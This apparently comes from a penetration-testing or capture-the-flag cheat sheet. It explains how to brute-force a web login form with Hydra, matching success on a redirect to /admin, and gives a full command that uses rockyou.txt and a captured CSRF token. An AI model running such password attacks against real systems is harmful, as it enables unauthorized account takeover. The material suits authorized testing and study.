Login Brute Force with Success Match (Hydra)
credentialstool
Summary
Brute-forces a login form using a success condition (S=) instead of a failure string, matching the post-login redirect to /admin.
Walkthrough
Use Hydra with a success match when the failure response is hard to fingerprint but a successful login produces a known redirect.
Steps
- Capture a valid
authenticity_token(CSRF token) and place it in the request body. - Identify what a successful login returns (here a redirect to
/admin) and pass it withS=. - Run with
-lfor the user and-P rockyou.txtfor the password list.
Commands
bash
hydra -l admin -P rockyou.txt <TARGET> http-post-form "/admin/login:authenticity_token=TOKEN&user[username]=^USER^&user[password]=^PASS^:S=/admin"